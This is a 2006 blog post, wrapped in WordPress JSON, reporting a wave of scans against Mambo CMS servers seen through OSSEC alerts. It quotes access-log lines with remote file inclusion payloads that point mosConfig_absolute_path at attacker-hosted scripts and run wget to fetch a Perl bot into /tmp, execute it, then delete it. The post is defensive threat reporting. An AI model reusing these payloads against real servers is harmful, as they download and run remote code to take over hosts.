{"id":377,"date":"2006-05-15T04:45:00","date_gmt":"2006-05-15T04:45:00","guid":{"rendered":"https:\/\/defragged.org\/ossec\/?p=377"},"modified":"2020-07-03T04:46:33","modified_gmt":"2020-07-03T04:46:33","slug":"high-volume-of-web-mambo-scans","status":"publish","type":"post","link":"https:\/\/defragged.org\/ossec\/2006\/05\/high-volume-of-web-mambo-scans\/","title":{"rendered":"High volume of web (mambo) scans."},"content":{"rendered":"\n

Since Thursday night I\u2019m seeing a high volume of scans
on different web servers for possibly the following vulns:<\/p>\n\n\n\n

http:\/\/secunia.com\/advisories\/14337\/http:\/\/www.osvdb.org\/displayvuln.php?osvdb_id=10180<\/a><\/p>\n\n\n\n

However, they say the problem is on function.php and I\u2019m seeing them on index.php. Can anyone confirm that?
Some log samples below..<\/p>\n\n\n\n

200.80.39.39 - - [12\/May\/2006:15:27:28 -0300] \"GET\n\/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http:\/\/luxsurf.com\/images\/cmd.txt?&cmd=cd%20\/tmp;wget%20http:\/\/luxsurf.com\/images\/xentonix;perl%20xentonix;rm%20-rf%20xentonix?\nHTTP\/1.0\" 404 167 \"-\" \"Mozilla\/5.0\"\n217.160.131.47 - - [12\/May\/2006:15:34:30 -0300] \"GET\n\/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http:\/\/toma.si\/dare\/cmd.txt?&cmd=cd%20\/tmp;wget%20http:\/\/toma.si\/dare\/xentonix;perl%20xentonix;rm%20-rf%20xentonix?\nHTTP\/1.0\" 404 167 \"-\" \"Mozilla\/5.0\"\n58.26.138.159 - - [12\/May\/2006:16:03:47 -0300] \"GET\n\/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http:\/\/toma.si\/dare\/cmd.txt?&cmd=cd%20\/tmp;wget%20http:\/\/toma.si\/dare\/xentonix;perl%20xentonix;rm%20-rf%20xentonix?\nHTTP\/1.0\" 404 167 \"-\" \"Mozilla\/5.0\"\n200.80.39.39 - - [12\/May\/2006:16:27:28 -0300] \"GET\n\/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http:\/\/luxsurf.com\/images\/cmd.txt?&cmd=cd%20\/tmp;wget%20http:\/\/luxsurf.com\/images\/xentonix;perl%20xentonix;rm%20-rf%20xentonix?\nHTTP\/1.0\" 404 167 \"-\" \"Mozilla\/5.0\"\n217.160.131.47 - - [12\/May\/2006:16:29:30 -0300] \"GET\n\/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http:\/\/toma.si\/dare\/cmd.txt?&cmd=cd%20\/tmp;wget%20http:\/\/toma.si\/dare\/xentonix;perl%20xentonix;rm%20-rf%20xentonix?\nHTTP\/1.0\" 404 167 \"-\" \"Mozilla\/5.0\"\n58.26.138.159 - - [12\/May\/2006:16:36:47 -0300] \"GET\n\/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http:\/\/toma.si\/dare\/cmd.txt?&cmd=cd%20\/tmp;wget%20http:\/\/toma.si\/dare\/xentonix;perl%20xentonix;rm%20-rf%20xentonix?\nHTTP\/1.0\" 404 167 \"-\" \"Mozilla\/5.0\"\n212.87.13.140 - - [12\/May\/2006:16:50:02 -0300] \"GET\n\/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http:\/\/radius01.comete.ci\/tool.gif?&cmd=cd%20\/tmp\/;wget%20http:\/\/radius01.comete.ci\/session.gif;perl%20session.gif;rm%20-rf%20session.*?\nHTTP\/1.0\" 404 167 \"-\" \"Mozilla\/5.0\"<\/pre>\n\n\n\n
These are just a few from 15:00 nd 17:00 pm yesterday.
Interesting is that they don\u2019t do anything else, just
try to execute it and leave (without searching for
other paths)\u2026 Btw, I\u2019m seeing these alerts from
ossec.<\/p>\n","protected":false},"excerpt":{"rendered":"
Since Thursday night I\u2019m seeing a high volume of scanson different web servers for possibly the following vulns: http:\/\/secunia.com\/advisories\/14337\/http:\/\/www.osvdb.org\/displayvuln.php?osvdb_id=10180 However, they say the problem is on function.php and I\u2019m seeing them on index.php. Can anyone confirm that?Some log samples below.. 200.80.39.39 – – [12\/May\/2006:15:27:28 -0300] “GET \/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http:\/\/luxsurf.com\/images\/cmd.txt?&cmd=cd%20\/tmp;wget%20http:\/\/luxsurf.com\/images\/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP\/1.0” 404 167 “-” “Mozilla\/5.0” 217.160.131.47 – – […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3],"tags":[],"_links":{"self":[{"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/posts\/377"}],"collection":[{"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/comments?post=377"}],"version-history":[{"count":1,"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/posts\/377\/revisions"}],"predecessor-version":[{"id":378,"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/posts\/377\/revisions\/378"}],"wp:attachment":[{"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/media?parent=377"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/categories?post=377"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/defragged.org\/ossec\/wp-json\/wp\/v2\/tags?post=377"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}